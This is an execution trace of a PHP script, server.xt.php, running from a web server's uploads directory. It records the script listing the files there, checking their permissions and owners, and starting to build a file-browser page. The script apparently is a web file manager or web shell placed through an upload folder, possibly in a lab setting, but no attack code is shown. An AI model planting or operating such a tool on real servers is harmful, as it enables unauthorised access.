4	85	0	0.005165	795080	function_exists	0		/var/www/html/uploads/server.xt.php	889	1	'posix_getgrgid'
4	85	1	0.005178	795120
4	85	R			TRUE
4	86	0	0.005190	795080	posix_getgrgid	0		/var/www/html/uploads/server.xt.php	889	1	0
4	86	1	0.005212	795736
4	86	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	87	0	0.005232	795704	reset	0		/var/www/html/uploads/server.xt.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	87	1	0.005248	796112
4	87	R			'root'
3		A						/var/www/html/uploads/server.xt.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.xt.php	891	$files[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	88	0	0.005301	795752	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	88	1	0.005315	795824
4	88	R			'.'
3		A						/var/www/html/uploads/server.xt.php	853	$filename = '.'
3		A						/var/www/html/uploads/server.xt.php	855	$path = '/var/www/html/uploads/.'
4	89	0	0.005349	795832	lstat	0		/var/www/html/uploads/server.xt.php	857	1	'/var/www/html/uploads/.'
4	89	1	0.005365	797616
4	89	R			[0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.xt.php	857	$stat = [0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
4	90	0	0.005425	796520	is_file	0		/var/www/html/uploads/server.xt.php	862	1	'/var/www/html/uploads/.'
4	90	1	0.005439	796552
4	90	R			FALSE
4	91	0	0.005452	796512	is_dir	0		/var/www/html/uploads/server.xt.php	863	1	'/var/www/html/uploads/.'
4	91	1	0.005465	796552
4	91	R			TRUE
4	92	0	0.005478	796512	is_link	0		/var/www/html/uploads/server.xt.php	864	1	'/var/www/html/uploads/.'
4	92	1	0.005491	796552
4	92	R			FALSE
4	93	0	0.005503	796512	is_readable	0		/var/www/html/uploads/server.xt.php	865	1	'/var/www/html/uploads/.'
4	93	1	0.005518	796552
4	93	R			TRUE
4	94	0	0.005531	796512	is_writable	0		/var/www/html/uploads/server.xt.php	866	1	'/var/www/html/uploads/.'
4	94	1	0.005545	796552
4	94	R			TRUE
4	95	0	0.005564	796512	filemtime	0		/var/www/html/uploads/server.xt.php	871	1	'/var/www/html/uploads/.'
4	95	1	0.005577	796552
4	95	R			1676253117
4	96	0	0.005590	796512	fileatime	0		/var/www/html/uploads/server.xt.php	872	1	'/var/www/html/uploads/.'
4	96	1	0.005603	796552
4	96	R			1676253117
4	97	0	0.005615	796512	filectime	0		/var/www/html/uploads/server.xt.php	873	1	'/var/www/html/uploads/.'
4	97	1	0.005628	796552
4	97	R			1676253117
3		A						/var/www/html/uploads/server.xt.php	873	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117]
4	98	0	0.005670	796568	file_exists	0		/var/www/html/uploads/server.xt.php	877	1	'/var/www/html/uploads/./.'
4	98	1	0.005685	796608
4	98	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	877	$file['is_executable'] = TRUE
4	99	0	0.005710	796512	function_exists	0		/var/www/html/uploads/server.xt.php	888	1	'posix_getpwuid'
4	99	1	0.005724	796552
4	99	R			TRUE
4	100	0	0.005736	796512	posix_getpwuid	0		/var/www/html/uploads/server.xt.php	888	1	0
4	100	1	0.005759	797312
4	100	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	101	0	0.005782	797280	reset	0		/var/www/html/uploads/server.xt.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	101	1	0.005802	797688
4	101	R			'root'
3		A						/var/www/html/uploads/server.xt.php	888	$file['owner_name'] = 'root'
4	102	0	0.005827	796544	function_exists	0		/var/www/html/uploads/server.xt.php	889	1	'posix_getgrgid'
4	102	1	0.005841	796584
4	102	R			TRUE
4	103	0	0.005854	796544	posix_getgrgid	0		/var/www/html/uploads/server.xt.php	889	1	0
4	103	1	0.005875	797200
4	103	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	0	0.005895	797168	reset	0		/var/www/html/uploads/server.xt.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	1	0.005911	797576
4	104	R			'root'
3		A						/var/www/html/uploads/server.xt.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.xt.php	891	$files[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	105	0	0.005963	797216	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	105	1	0.005977	797296
4	105	R			'prepend.php'
3		A						/var/www/html/uploads/server.xt.php	853	$filename = 'prepend.php'
3		A						/var/www/html/uploads/server.xt.php	855	$path = '/var/www/html/uploads/prepend.php'
4	106	0	0.006013	797320	lstat	0		/var/www/html/uploads/server.xt.php	857	1	'/var/www/html/uploads/prepend.php'
4	106	1	0.006029	799128
4	106	R			[0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.xt.php	857	$stat = [0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
4	107	0	0.006090	798032	is_file	0		/var/www/html/uploads/server.xt.php	862	1	'/var/www/html/uploads/prepend.php'
4	107	1	0.006106	798088
4	107	R			TRUE
4	108	0	0.006119	798048	is_dir	0		/var/www/html/uploads/server.xt.php	863	1	'/var/www/html/uploads/prepend.php'
4	108	1	0.006132	798088
4	108	R			FALSE
4	109	0	0.006145	798048	is_link	0		/var/www/html/uploads/server.xt.php	864	1	'/var/www/html/uploads/prepend.php'
4	109	1	0.006158	798088
4	109	R			FALSE
4	110	0	0.006170	798048	is_readable	0		/var/www/html/uploads/server.xt.php	865	1	'/var/www/html/uploads/prepend.php'
4	110	1	0.006185	798088
4	110	R			TRUE
4	111	0	0.006198	798048	is_writable	0		/var/www/html/uploads/server.xt.php	866	1	'/var/www/html/uploads/prepend.php'
4	111	1	0.006213	798088
4	111	R			FALSE
4	112	0	0.006226	798048	filemtime	0		/var/www/html/uploads/server.xt.php	871	1	'/var/www/html/uploads/prepend.php'
4	112	1	0.006239	798088
4	112	R			1676253117
4	113	0	0.006253	798048	fileatime	0		/var/www/html/uploads/server.xt.php	872	1	'/var/www/html/uploads/prepend.php'
4	113	1	0.006265	798088
4	113	R			1676253117
4	114	0	0.006278	798048	filectime	0		/var/www/html/uploads/server.xt.php	873	1	'/var/www/html/uploads/prepend.php'
4	114	1	0.006291	798088
4	114	R			1676253117
3		A						/var/www/html/uploads/server.xt.php	873	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117]
4	115	0	0.006330	798048	is_executable	0		/var/www/html/uploads/server.xt.php	880	1	'/var/www/html/uploads/prepend.php'
4	115	1	0.006345	798088
4	115	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	880	$file['is_executable'] = TRUE
4	116	0	0.006375	798048	function_exists	0		/var/www/html/uploads/server.xt.php	888	1	'posix_getpwuid'
4	116	1	0.006389	798088
4	116	R			TRUE
4	117	0	0.006401	798048	posix_getpwuid	0		/var/www/html/uploads/server.xt.php	888	1	0
4	117	1	0.006424	798848
4	117	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	0	0.006448	798816	reset	0		/var/www/html/uploads/server.xt.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	1	0.006467	799224
4	118	R			'root'
3		A						/var/www/html/uploads/server.xt.php	888	$file['owner_name'] = 'root'
4	119	0	0.006492	798080	function_exists	0		/var/www/html/uploads/server.xt.php	889	1	'posix_getgrgid'
4	119	1	0.006505	798120
4	119	R			TRUE
4	120	0	0.006518	798080	posix_getgrgid	0		/var/www/html/uploads/server.xt.php	889	1	0
4	120	1	0.006539	798736
4	120	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	0	0.006559	798704	reset	0		/var/www/html/uploads/server.xt.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	1	0.006575	799112
4	121	R			'root'
3		A						/var/www/html/uploads/server.xt.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.xt.php	891	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	122	0	0.006628	798752	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	122	1	0.006642	798824
4	122	R			'data'
3		A						/var/www/html/uploads/server.xt.php	853	$filename = 'data'
3		A						/var/www/html/uploads/server.xt.php	855	$path = '/var/www/html/uploads/data'
4	123	0	0.006676	798840	lstat	0		/var/www/html/uploads/server.xt.php	857	1	'/var/www/html/uploads/data'
4	123	1	0.006692	800624
4	123	R			[0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.xt.php	857	$stat = [0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
4	124	0	0.006752	799528	is_file	0		/var/www/html/uploads/server.xt.php	862	1	'/var/www/html/uploads/data'
4	124	1	0.006767	799560
4	124	R			FALSE
4	125	0	0.006780	799520	is_dir	0		/var/www/html/uploads/server.xt.php	863	1	'/var/www/html/uploads/data'
4	125	1	0.006793	799560
4	125	R			TRUE
4	126	0	0.006806	799520	is_link	0		/var/www/html/uploads/server.xt.php	864	1	'/var/www/html/uploads/data'
4	126	1	0.006819	799560
4	126	R			FALSE
4	127	0	0.006832	799520	is_readable	0		/var/www/html/uploads/server.xt.php	865	1	'/var/www/html/uploads/data'
4	127	1	0.006847	799560
4	127	R			TRUE
4	128	0	0.006859	799520	is_writable	0		/var/www/html/uploads/server.xt.php	866	1	'/var/www/html/uploads/data'
4	128	1	0.006874	799560
4	128	R			TRUE
4	129	0	0.006887	799520	filemtime	0		/var/www/html/uploads/server.xt.php	871	1	'/var/www/html/uploads/data'
4	129	1	0.006899	799560
4	129	R			1676253117
4	130	0	0.006912	799520	fileatime	0		/var/www/html/uploads/server.xt.php	872	1	'/var/www/html/uploads/data'
4	130	1	0.006925	799560
4	130	R			1676253117
4	131	0	0.006938	799520	filectime	0		/var/www/html/uploads/server.xt.php	873	1	'/var/www/html/uploads/data'
4	131	1	0.006951	799560
4	131	R			1676253117
3		A						/var/www/html/uploads/server.xt.php	873	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117]
4	132	0	0.006989	799576	file_exists	0		/var/www/html/uploads/server.xt.php	877	1	'/var/www/html/uploads/data/.'
4	132	1	0.007004	799616
4	132	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	877	$file['is_executable'] = TRUE
4	133	0	0.007029	799520	function_exists	0		/var/www/html/uploads/server.xt.php	888	1	'posix_getpwuid'
4	133	1	0.007043	799560
4	133	R			TRUE
4	134	0	0.007055	799520	posix_getpwuid	0		/var/www/html/uploads/server.xt.php	888	1	0
4	134	1	0.007077	800320
4	134	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	0	0.007104	800288	reset	0		/var/www/html/uploads/server.xt.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	1	0.007123	800696
4	135	R			'root'
3		A						/var/www/html/uploads/server.xt.php	888	$file['owner_name'] = 'root'
4	136	0	0.007149	799552	function_exists	0		/var/www/html/uploads/server.xt.php	889	1	'posix_getgrgid'
4	136	1	0.007162	799592
4	136	R			TRUE
4	137	0	0.007175	799552	posix_getgrgid	0		/var/www/html/uploads/server.xt.php	889	1	0
4	137	1	0.007196	800208
4	137	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	0	0.007216	800176	reset	0		/var/www/html/uploads/server.xt.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	1	0.007232	800584
4	138	R			'root'
3		A						/var/www/html/uploads/server.xt.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.xt.php	891	$files[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	139	0	0.007285	800224	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	139	1	0.007299	800304
4	139	R			'.htaccess'
3		A						/var/www/html/uploads/server.xt.php	853	$filename = '.htaccess'
3		A						/var/www/html/uploads/server.xt.php	855	$path = '/var/www/html/uploads/.htaccess'
4	140	0	0.007334	800320	lstat	0		/var/www/html/uploads/server.xt.php	857	1	'/var/www/html/uploads/.htaccess'
4	140	1	0.007351	802112
4	140	R			[0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.xt.php	857	$stat = [0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 8]
4	141	0	0.007411	801016	is_file	0		/var/www/html/uploads/server.xt.php	862	1	'/var/www/html/uploads/.htaccess'
4	141	1	0.007426	801056
4	141	R			TRUE
4	142	0	0.007439	801016	is_dir	0		/var/www/html/uploads/server.xt.php	863	1	'/var/www/html/uploads/.htaccess'
4	142	1	0.007452	801056
4	142	R			FALSE
4	143	0	0.007465	801016	is_link	0		/var/www/html/uploads/server.xt.php	864	1	'/var/www/html/uploads/.htaccess'
4	143	1	0.007478	801056
4	143	R			FALSE
4	144	0	0.007490	801016	is_readable	0		/var/www/html/uploads/server.xt.php	865	1	'/var/www/html/uploads/.htaccess'
4	144	1	0.007505	801056
4	144	R			TRUE
4	145	0	0.007518	801016	is_writable	0		/var/www/html/uploads/server.xt.php	866	1	'/var/www/html/uploads/.htaccess'
4	145	1	0.007532	801056
4	145	R			FALSE
4	146	0	0.007546	801016	filemtime	0		/var/www/html/uploads/server.xt.php	871	1	'/var/www/html/uploads/.htaccess'
4	146	1	0.007559	801056
4	146	R			1676253117
4	147	0	0.007572	801016	fileatime	0		/var/www/html/uploads/server.xt.php	872	1	'/var/www/html/uploads/.htaccess'
4	147	1	0.007585	801056
4	147	R			1676253117
4	148	0	0.007598	801016	filectime	0		/var/www/html/uploads/server.xt.php	873	1	'/var/www/html/uploads/.htaccess'
4	148	1	0.007610	801056
4	148	R			1676253117
3		A						/var/www/html/uploads/server.xt.php	873	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117]
4	149	0	0.007648	801016	is_executable	0		/var/www/html/uploads/server.xt.php	880	1	'/var/www/html/uploads/.htaccess'
4	149	1	0.007664	801056
4	149	R			FALSE
3		A						/var/www/html/uploads/server.xt.php	880	$file['is_executable'] = FALSE
4	150	0	0.007689	801016	function_exists	0		/var/www/html/uploads/server.xt.php	888	1	'posix_getpwuid'
4	150	1	0.007702	801056
4	150	R			TRUE
4	151	0	0.007715	801016	posix_getpwuid	0		/var/www/html/uploads/server.xt.php	888	1	0
4	151	1	0.007737	801816
4	151	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	0	0.007760	801784	reset	0		/var/www/html/uploads/server.xt.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	1	0.007797	802192
4	152	R			'root'
3		A						/var/www/html/uploads/server.xt.php	888	$file['owner_name'] = 'root'
4	153	0	0.007825	801048	function_exists	0		/var/www/html/uploads/server.xt.php	889	1	'posix_getgrgid'
4	153	1	0.007839	801088
4	153	R			TRUE
4	154	0	0.007851	801048	posix_getgrgid	0		/var/www/html/uploads/server.xt.php	889	1	0
4	154	1	0.007874	801704
4	154	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	0	0.007894	801672	reset	0		/var/www/html/uploads/server.xt.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	1	0.007911	802080
4	155	R			'root'
3		A						/var/www/html/uploads/server.xt.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/server.xt.php	891	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	156	0	0.007964	801720	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	156	1	0.007979	801760
4	156	R			FALSE
3		A						/var/www/html/uploads/server.xt.php	853	$filename = FALSE
3	52	1	0.008004	799968
3	52	R			[0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
2		A						/var/www/html/uploads/server.xt.php	1186	$list = [0 => ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
3	157	0	0.008151	799968	array_key_exists	0		/var/www/html/uploads/server.xt.php	1188	2	'sort'	[]
3	157	1	0.008165	800032
3	157	R			FALSE
2		A						/var/www/html/uploads/server.xt.php	1188	$sort = 'filename'
3	158	0	0.008190	799968	array_key_exists	0		/var/www/html/uploads/server.xt.php	1189	2	'reverse'	[]
3	158	1	0.008204	800032
3	158	R			FALSE
2		A						/var/www/html/uploads/server.xt.php	1189	$reverse = FALSE
3	159	0	0.008230	799968	directory_choice	1		/var/www/html/uploads/server.xt.php	1198	0
4	160	0	0.008245	800112	urlencode	0		/var/www/html/uploads/server.xt.php	1438	1	'/var/www/html/uploads/'
4	160	1	0.008259	800208
4	160	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4	161	0	0.008275	800144	word	1		/var/www/html/uploads/server.xt.php	1438	1	'directory'
5	162	0	0.008289	800168	htmlentities	0		/var/www/html/uploads/server.xt.php	1599	3	'Directory'	2	'UTF-8'
5	162	1	0.008306	800440
5	162	R			'Directory'
4	161	1	0.008320	800328
4	161	R			'Directory'
4	163	0	0.008335	800232	textfieldsize	1		/var/www/html/uploads/server.xt.php	1439	1	'/var/www/html/uploads/'
4		A						/var/www/html/uploads/server.xt.php	1575	$size = 27
4		A						/var/www/html/uploads/server.xt.php	1576	$size = 30
4	163	1	0.008370	800232
4	163	R			30
4	164	0	0.008383	800264	html	1		/var/www/html/uploads/server.xt.php	1439	1	'/var/www/html/uploads/'
5	165	0	0.008396	800264	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'/var/www/html/uploads/'	2	NULL
5	165	1	0.008411	800536
5	165	R			'/var/www/html/uploads/'
4	164	1	0.008426	800424
4	164	R			'/var/www/html/uploads/'
4	166	0	0.008440	800360	word	1		/var/www/html/uploads/server.xt.php	1440	1	'change'
